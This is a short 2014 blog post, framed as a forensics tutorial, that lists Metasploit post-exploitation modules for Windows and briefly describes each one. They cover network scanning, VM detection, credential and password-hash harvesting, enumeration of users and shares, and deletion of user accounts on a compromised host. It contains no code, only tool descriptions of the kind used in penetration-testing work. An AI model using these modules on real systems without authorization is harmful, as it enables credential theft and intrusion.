Sunday, May 11, 2014

Metasploit Modules Post Windows Gather {Computer Forensics Tutorial}




Now Open Kali Linux terminal type msfconsole
 
Once you got the meterpreter session 

1)      arp_scanner
The "arp_scanner" post module will perform an ARP scan for 
a given range through a compromised host.




2)      checkvm
The "checkvm" post module, simply enough, checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines. 


3)      credential_collector
The "credential_collector" module harvests passwords hashes and tokens on the compromised host. 


4)      dumplinks
The "dumplinks" module parses the .lnk files in a users Recent Documents which could be useful for further information gathering. Note that, as shown below, we first need to migrate into a user process prior to running the module. 


5)      enum_applications
The "enum_applications" module enumerates the applications that are installed on the compromised host. 

6)      enum_logged_on_users
The "enum_logged_on_users" post module returns a listing of current and recently logged on users along with their SIDs. 


7)      enum_shares
The "enum_shares" post module returns a listing of both configured and recently used shares on the compromised system. 


8)      enum_snmp
The "enum_snmp" module will enumerate the SNMP service configuration on the target, if present, including the community strings. 



9)      hashdump
The "hashdump" post module will dump the local users accounts on the compromised host using the registry.

10)  usb_history
The "usb_history" module enumerates the USB drive history on the compromised system. 

11)  delete_user
The "delete_user" post module deletes a specified user account from the compromised system. 


No comments:

Post a Comment

Google+ Followers

Contact Form

Name

Email *

Message *